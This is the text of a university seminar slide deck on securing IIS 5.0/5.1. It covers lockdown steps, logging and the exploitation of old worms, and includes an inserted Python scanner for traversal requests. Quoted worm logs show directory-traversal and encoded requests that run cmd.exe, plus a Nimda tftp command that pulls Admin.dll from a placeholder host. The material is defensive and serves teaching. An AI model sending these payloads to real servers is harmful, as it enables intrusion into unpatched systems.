IIS 5.0/5.1 Security - PowerPoint PPT Presentation

1
IIS 5.0/5.1 Security
  • Laurie Walters
  • lxm30@psu.edu
  • Security Operations and Services
  • A Unit of Information Technology Services

2
IIS Security Seminar Objectives
  • IIS Security
  • Installation of IIS
  • Backing Up IIS Configuration files
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

3
Installing IIS
  • IIS Patch must be applied before machine is
    networked!
  • It is better to install IIS after operating
    system is secured than while initially setting up
    OS.
  • Add/Remove Programs > Add/Remove Windows
    Components

4
IIS Installation
  • By default, the following are installed
  • Common Files
  • Documentation
  • Front Page 2000 Server Extensions
  • IIS Snap-In
  • SMTP service
  • WWW Service
  • Do not install Documentation on a production web
    server.
  • If you are not using Form Mail, do not install
    SMTP service.

5
IIS Installation
  • The following are not installed by default
  • FTP Service
  • Scripts virtual directory
  • Do not install these unless absolutely necessary

6
IIS Installation
  • Adds the Internet Information Services snap-in (ISM)
    and the server extension administrator snap-in to
    Administrative Tools.
  • Adds accounts
  • IUSR_MACHINENAME - built-in account for anonymous
    IIS access
  • IWAM_MACHINENAME - built-in account for out-of-
    process access

7
Uninstallation of IIS
  • The following aren't uninstalled:
  • \Inetpub
  • %Systemroot%\Help\iishelp
  • %Systemroot%\system32\inetsrv
  • The following users are not removed:
  • IUSR_Machinename
  • IWAM_Machinename

8
IIS Security Seminar Objectives
  • IIS Security
  • Installation of IIS
  • Backing Up IIS Metabase
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

9
Backing Up IIS Metabase
  • The IIS Metabase is similar to the Windows
    registry. It stores configuration entries for
    IIS.
  • The Metabase can become corrupted so it should be
    backed up every time a change is made to IIS.

10
Backing Up IIS Metabase
  • To back up the Metabase, in the ISM, right-click
    on your server icon and select Backup/Restore
    Configuration.
  • Click on Create Backup and enter a meaningful
    name.

11
IIS Security Seminar Objectives
  • IIS Security
  • Backing Up IIS Metabase
  • Installation of IIS
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

12
Ways to Overcome Common IIS Breaches Other Than
Patching
  • Patching prevents current vulnerabilities

13
Other means than patching help secure against
future vulnerabilities
  • Always install IIS on NTFS formatted drives
  • Install IIS on separate hard drive or
  • Do not allow everyone or the IUSR account to run
    .exe (e.g. cmd.exe) commands
  • Use URLScan and IIS Lockdown Tools
  • Follow suggested SOS guidelines for securing OS
    and IIS

14
IIS Lockdown Tool
  • http://www.microsoft.com/technet/treeview/default.
    asp?url=/technet/security/tools/Tools/locktool.asp
  • Turns off unnecessary services and features of
    IIS.

15
URLScan
  • Part of IIS Lockdown tool. It also turns off
    unneeded features and restricts type of HTTP
    requests that the server can process.
  • Execute the following command to extract the
    lockdown files:
  • iislockd.exe /q /c /t:c:\lockdown_files
  • It will place urlscan.exe in this folder.
  • Run urlscan.exe to install it.

16
What can be filtered with URLScan
  • Request method (verb), e.g. GET, HEAD, POST, etc.
  • File extension of the resource requested
  • Suspicious URL encoding
  • Presence of non-ASCII characters in the URL
  • Presence of specified character sequences in the
    URL
  • Presence of specified headers in the request

17
Additional abilities of URLScan 2.5
  • Ability to change the log file directory
  • Ability to log long URLs
  • Ability to restrict the size of requests

18
Securing IIS Manually
  • Change permissions on vital files
  • cacls %systemroot%\*.exe /T /G System:F
    Administrators:F
  • Also change permission for the file command.com
  • Do not use Default Web Site
  • Stop Administrative Web Site
  • Remove IIS Samples and Documentation
  • Group all static content separate from scripts,
    executables, etc.
  • Remove Unnecessary script mappings

19
Make sure you have the correct version of MDAC
  • MDAC provides the underlying functionality for
    database operations, like connecting to remote
    databases and returning data to a client.
  • Heap overflow vulnerability in versions 2.6 and
    lower.
  • If you do not need MDAC, remove this virtual
    directory from your system. 

20
Removing Unnecessary Script Mappings
  • .ida, .idq, .htw - Index Services
  • .htr - web-based Windows password reset
  • .printer - Internet Printing Protocol
  • .stm, .shtm, .shtml - server-side includes
  • .idc - database applications

21
Disabling Parent Paths
  • Parent Paths allow you to use relative file path
    names (../directory/file.html instead of
    c:/directory/file.html).
  • The vulnerability in Parent Paths is that they
    can be exploited to move in reverse through the
    file structure to get to the root of C:\.
  • Then one can traverse to known file locations
    that are
  • more permissive (e.g. C:\wwwroot\inetpub\scripts)
    or
  • contain goodies (e.g. C:\winnt\system32)

22
You can disable parent paths and still use
relative pathnames
  • Note: It is possible to use relative pathnames
    with some effort
  • (e.g. if your IIS data folder is in a different
    folder than your database and you don't want to
    use absolute pathnames for everything).
  • You have to write some code that stores the
    absolute pathname in a variable and builds the
    relative pathnames from it.
  • http://www.windowswebsolutions.com/Articles/Index.
    cfm?ArticleID=23278

23
Demonstrations
  • Manually securing IIS
  • IIS Lockdown Tool

24
IIS Security Seminar Objectives
  • IIS Security
  • Installation of IIS
  • Backing Up IIS Metabase
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

25
IIS Authentication
  • To set means of IIS Authentication, right click
    on your web site and select properties, then
    choose the directory security tab. Click on the
    Edit button next to Anonymous access and
    Authentication control.
  • Anonymous - uses IUSR_Machinename to anonymously
    access the site
  • Integrated Windows - users connect to the machine
    with a Windows username and password
  • Basic - authenticates to the machine using an
    unencrypted username / password (user accounts
    must have "log on locally" rights)
  • Digest - authentication within a W2K domain;
    password hashes are compared against DC hashes
  • Kerberos - authenticates to a K4 or K5 domain

26
IIS Security Seminar Objectives
  • IIS Security
  • Installation of IIS
  • Backing Up IIS Metabase
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

27
FTP and SMTP
  • Disable SMTP and FTP if not needed; if absolutely
    needed, limit access by userid/password or IP
    address.
  • Use other means than FTP if possible (WebDAV,
    Terminal Services, etc.).
  • Allowing totally anonymous connections to the
    machine is a bad idea.
  • Specify directory where users can upload/download
    files.
  • Create appropriate permissions on files in this
    directory (e.g. remote users can read but not
    write or execute files).

28
IIS Security Seminar Objectives
  • IIS Security
  • Installation of IIS
  • Backing Up IIS Metabase
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

29
IIS Logging
  • Enable extended logging properties in IIS Manager
  • Use W3C Extended Log Format instead of Active Log
    Format
  • Make sure Date, Time, Server IP, Client IP, URI
    Stem and URI Query are checked
  • Daily logs are kept in UTC (GMT) in the following
    location:
    C:\Windows\System32\Logfiles\W3SVC1\ex020930.txt
  • Check the box "Use local time for file naming and
    rollover" so that logs are kept in EST/EDT
    instead of GMT.

30
IIS Security Seminar Objectives
  • IIS Security
  • Installation of IIS
  • Backing Up IIS Configuration files
  • Authentication
  • FTP and SMTP
  • Securing IIS manually and with IIS Lockdown tool
  • Logging
  • Common IIS Breaches and how to prevent them

31
Common IIS Breaches
  • Buffer Overflows (XXXXXXXXXXXXXXX<code>)
  • Directory Traversal
    (../../../c:/winnt/system32/cmd.exe)
  • Canonicalization
  • Requests for unusual actions using cmd.exe or .bat
    files
  • Requests encoded using an alternate character set
    (e.g. Unicode) or including character sequences
    that are rarely seen in legitimate requests
  • All of above used for recent worms (e.g.
    IIS/Sadmind, Code Red, Code Red 2, Nimda)

32
Buffer Overflows
  • Programs don't check input for appropriate
    length.
  • Extra input beyond the maximum length gets
    written onto the CPU execution stack.
  • Attackers must carefully craft B.O. code to
    identify where on the stack it is placed, so that
    execution returns to that location and runs the
    arbitrary input.

33
Problem with Buffer Overflows in IIS
  • IIS process runs in the context of the SYSTEM
    account.
  • When a Buffer Overflow is leveraged against IIS,
    arbitrary commands can be run under context of
    SYSTEM user.

34
Canonicalization
  • Various file names are equivalent
  • E.g. c:\directory\file.html, file.html, and
    ..\..\file.html may all refer to the same file
  • When some non-static file types are requested via
    a malformed URL, the canonicalization locates the
    correct file, but mixes up the actual location of
    the file.
  • Since it determines the file is in a different
    folder than it actually is, it applies incorrect
    permissions.

35
Problem with Canonicalization
  • A file in a folder with restricted permissions
    would be requested; however, the permissions
    granted would be those of the file's ancestors
    rather than the actual file permissions
  • If parent permissions are less restrictive, the
    attacker could get extra privileges for the
    file.

36
Directory Traversal (Dot Dot Slash)
  • Results from inadequate NTFS ACLs on the
    directory or files in question.
  • http://www.iistestbox.com/../../../../../winnt/sys
    tem32/cmd.exe

37
Examples of Unicode and Hex Encoding URLS
  • Unicode example: Arabic letters
  • Hexadecimal examples:
  • Space %20
  • Plus %2B
  • Period %2E
  • / %2F
  • Colon %3A
  • ? %3F
  • \ %5C
  • % %25

38
Hexadecimal use
  • Good use of hexadecimal:
  • http://www.iistestbox.com/files/the%20name%20o
    f%20the%20file.txt
  • Bad use of hexadecimal:
  • http://www.iistestbox.com/..%2F..%2Fwinnt/file.txt
  • Double decoding of hex
  • IIS performs two decodes of HTTP requests that
    traverse executable directories
  • %255c
  • 1st decode: %5c
  • 2nd decode: \

39
IIS Sadmind Worm
  • 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80
    GET /scripts/../../winnt/system32/cmd.exe /c+dir
    200 -
  • 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80
    GET /scripts/../../winnt/system32/cmd.exe
    /c+dir+..\ 200 -
  • 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80
    GET /scripts/../../winnt/system32/cmd.exe
    /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
  • 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80
    GET /scripts/root.exe /c+echo+<HTML code inserted
    here>.././index.asp 502 -

40
Effects of IIS / Sadmind
  • The sadmind/IIS worm exploited a vulnerability in
    Solaris systems. The Solaris worm created a root
    shell on the infected host and automatically
    attacked other vulnerable Solaris systems.
  • It subsequently installed software to attack and
    deface Microsoft IIS web servers.

41
Ways to Protect Against IIS Sadmind
  • Microsoft Patch MS00-078 to prevent the
    canonicalization vulnerability
  • Disable Parent Paths
  • Restrict access to cmd.exe so that it can't be
    used by the worm

42
.printer Buffer Overflow (jill.c)
  • .printer - Web-based control of networked printers
  • GET /NULL.printer HTTP/1.0
  • Host: <420-character buffer>
  • Instead of crashing, IIS automatically restarts
    itself due to redundancy
  • Jill exploits the .printer B.O. vulnerability to
    create a remote shell, where the attacker can
    enter any command at the following prompt:
  • C:\WINNT\System32>

43
Ways to protect against Jill B.O.
  • Microsoft Patch MS01-023
  • If not using IPP,
  • Unmap the .printer DLL file extension in IIS so
    that it is not loaded on IIS startup.
  • Or, you could delete the file
    C:\Winnt\System32\msw3prt.dll, which is the actual
    file that the .printer extension points to.

44
.ida/.idq Buffer Overflow
  • .ida provides support for administrative scripts,
  • .idq provides support for internet data queries
    (Indexing Services)
  • The .ida/.idq B.O. works by using .ida to send a
    too-long variable to idq.dll
  • GET /null.ida?<240-character buffer>=X HTTP/1.1
  • The IIS process is halted before this even reaches
    the Index service; IIS then restarts

45
Code Red 1 Worm (Another .ida/.idq worm)
  • GET /default.ida? followed by a long run of N
    characters and a %u-encoded payload (request
    signature omitted)

46
Effects of Code Red 1
  • A machine infected with Code Red 1 scans random
    IP addresses on port 80/TCP looking for other
    hosts to infect.
  • Code Red 1 is stored in memory (when machine
    reboots, worm no longer performs scans).
  • Web pages on Code Red 1-infected machines may be
    defaced with the following message
  • HELLO! Welcome to http://www.worm.com! Hacked By
    Chinese!

47
Ways to Protect Against Code Red 1
  • Microsoft Cumulative Patch MS02-062 (original
    patch MS01-033)
  • If not using Indexing Services, remove
    application mapping for .ida and .idq
  • Install URLScan to deny functionality of any
    request with hexadecimal

48
Code Red 2
  • GET /default.ida? followed by a long run of X
    characters and a %u-encoded payload (request
    signature omitted)

49
Effects of Code Red 2
  • After a successful .ida/.idq B.O., CR2 creates
    threads that scan for new hosts to infect for the
    next 24 hours.
  • Unlike Code Red 1, CR2 is not only
    memory-resident.
  • CR2 then copies cmd.exe to the file root.exe in
    the publicly accessible IIS scripts and MSADC
    folders (an intruder may then execute arbitrary
    commands with the privileges of the IIS server
    process).

50
CR2 Contains a Backdoor Trojan
  • A Trojan horse copy of explorer.exe is created
    with CR2 and copied to C:\ and D:\.
  • The Trojan horse explorer.exe calls the real
    explorer.exe to mask its existence, and creates a
    virtual mapping which exposes the C and D
    drives.
  • On systems not patched against the "Relative
    Shell Path" vulnerability, this Trojan horse copy
    of explorer.exe will run every time a user logs
    in.

51
Ways to Protect Against CR2
  • Microsoft Cumulative Patch MS02-062
  • If not using Indexing Services, remove
    application mapping for .ida and .idq
  • Install URLScan to deny functionality of any
    request with hexadecimal
  • Restrict access to cmd.exe so that it can't be
    used by the worm
  • Protect against the "Relative Shell Path"
    vulnerability: Microsoft Patch MS02-052

52
Nimda Worm
  • The Nimda worm is sent as an email attachment
  • that pretends to have an "audio/x-wav" content-type
  • (really an executable file).
  • If executed, it infects the host, causing various
    files to be replaced with infected copies.
  • The worm sends itself out by email, searches for
    open network shares, attempts to copy itself to
    un-patched or vulnerable Microsoft IIS web
    servers, and is a virus infecting both local
    files and files on remote network shares.

53
Nimda
  • GET /scripts/root.exe?/c+dir
  • GET /MSADC/root.exe?/c+dir
  • GET /c/winnt/system32/cmd.exe?/c+dir
  • GET /d/winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  • GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system
    32/cmd.exe?/c+dir
  • GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system
    32/cmd.exe?/c+dir
  • GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\x
    c1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+di
    r
  • GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/
    c+dir
  • GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+d
    ir
  • GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/
    c+dir
  • GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/
    c+dir
  • GET /scripts/..%35c../winnt/system32/cmd.exe?/c+di
    r
  • GET /scripts/..%35c../winnt/system32/cmd.exe?/c+di
    r
  • GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  • GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
  • Note: The first four entries in these sample logs
    denote attempts to connect to the backdoor left
    by Code Red II, while the remaining log entries
    are examples of exploit attempts for the
    Directory Traversal vulnerability.
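As an added example (not part of the original slides), the following Python script applies the decoding rules from the "Hexadecimal use" slide to W3C extended log lines like the Sadmind and Nimda entries above: it decodes each cs-uri-stem twice, as IIS 5 did under executable directories, accepts the overlong UTF-8 sequences old IIS accepted, normalizes the result against the web root and flags requests that escape it or name cmd.exe/root.exe. The sample log, its field order and the reason labels are constructed for this example.

```python
import posixpath
from urllib.parse import unquote_to_bytes

SHELLS = {"cmd.exe", "root.exe"}   # command shells the worms on the slides target


def lenient_decode(raw: str) -> tuple[str, list[str]]:
    """Decode a URL path the way IIS 5 did under executable directories and
    record which decoding tricks were needed to reach the final path."""
    reasons = []
    once = unquote_to_bytes(raw)      # first decode: every %XX becomes a byte
    twice = unquote_to_bytes(once)    # second decode: %255c -> %5c -> '\'
    if twice != once:
        reasons.append("double-encoding")
    out, i = bytearray(), 0
    while i < len(twice):
        b = twice[i]
        if b in (0xC0, 0xC1) and i + 1 < len(twice):
            # Overlong 2-byte sequence: strict UTF-8 rejects it, but IIS 5 accepted it,
            # so %c0%af decoded to '/' and %c1%9c (or %c1%1c) decoded to '\'.
            out.append(((b & 0x1F) << 6) | (twice[i + 1] & 0x3F))
            reasons.append("overlong-utf8")
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1").replace("\\", "/"), sorted(set(reasons))


def analyze(stem: str) -> list[str]:
    """Return the reasons a cs-uri-stem looks like a traversal or shell request."""
    path, reasons = lenient_decode(stem)
    rel = posixpath.normpath(path.lstrip("/"))   # resolve ../ against the web root
    if rel == ".." or rel.startswith("../"):
        reasons.append("escapes-webroot")
    if posixpath.basename(rel).lower() in SHELLS:
        reasons.append("command-shell")
    return reasons


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Parse W3C extended log lines (field order taken from the #Fields directive)
    and return (line number, cs-uri-stem, reasons) for every suspicious request."""
    fields, hits = None, []
    for n, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rec = dict(zip(fields, line.split()))
            reasons = analyze(rec.get("cs-uri-stem", ""))
            if reasons:
                hits.append((n, rec["cs-uri-stem"], reasons))
    return hits


# Constructed sample log using the fields the Logging slide asks for (not real traffic).
SAMPLE_LOG = """#Fields: date time c-ip s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2001-05-06 12:20:19 10.10.10.10 10.20.20.20 80 GET /default.htm - 200
2001-05-06 12:20:19 10.10.10.10 10.20.20.20 80 GET /files/the%20name%20of%20the%20file.txt - 200
2001-05-06 12:20:19 10.10.10.10 10.20.20.20 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-05-06 12:20:19 10.10.10.10 10.20.20.20 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-05-06 12:20:19 10.10.10.10 10.20.20.20 80 GET /scripts/root.exe /c+dir 404
"""

if __name__ == "__main__":
    for n, stem, why in scan_log(SAMPLE_LOG):
        print(f"line {n}: {stem} -> {', '.join(why)}")
```

The legitimate %20 request on line 3 produces no finding, which is the distinction the "good use / bad use of hexadecimal" slide draws.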

54
Nimda on IIS Server
  • Nimda attempts to install an Admin.dll file in
    the root directory of c:\, d:\, or e:\ (note that
    the file name Admin.dll may be legitimately
    installed by IIS in other directories).
  • It then scans other systems on port 80,
    attempting to infect them with Nimda

55
Nimda Backdoor
  • Attackers send the string
    /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll
    to attempt to connect to infected systems.
  • A return code of 200 indicates success of this
    command.

56
Ways to Protect Against Nimda (Email Portion)
  • Microsoft Patch for automatic execution of
    previewed files in Outlook (MS01-020)
  • Do not open attachments without verification
  • Protect against open network shares

57
Ways to Protect Against Nimda (IIS Portion)
  • Microsoft Cumulative Patch MS02-062 (protects
    against both means of Nimda IIS infection: the
    Code Red 2 backdoor and Directory Traversal)
  • If not using Indexing Services, remove
    application mapping for .ida and .idq
  • Install URLScan to deny functionality of any
    request with hexadecimal
  • Restrict access to cmd.exe so that it can't be
    used by the worm
  • Protect against the "Relative Shell Path"
    vulnerability of explorer.exe: Microsoft Patch
    MS02-052
  • Disable Parent Paths

58
IIS Security Seminar Objectives
  • Installation of IIS
  • Backing Up IIS Configuration files
  • Securing IIS manually and with IIS Lockdown tool
  • Authentication
  • FTP and SMTP
  • Logging
  • Common IIS Breaches and how to prevent them

59
In Conclusion
  • IIS is a big target for skilled hackers as well
    as script kiddies.
  • Staying current on patches will help prevent your
    IIS box from being broken into; however, proper
    locking down will also be highly effective
    against future vulnerabilities.

60
Microsoft Security Guides
  • Microsoft Guide to Securing IIS 5
  • http://www.microsoft.com/technet/treeview/default
    .asp?url=/technet/prodtechnol/iis/tips/iis5chk.asp
  • Microsoft Guide to Securing Windows 2000
  • http://www.microsoft.com/technet/treeview/default
    .asp?url=/technet/security/prodtech/windows/secwin
    2k/default.asp

61
Slides and Recommended Guidelines
  • Today's slides, recommended guidelines for IIS,
    Windows 2000 and XP, links to security tools and
    further reading
  • http://www.personal.psu.edu/lxm30/windows/windows
    .html

62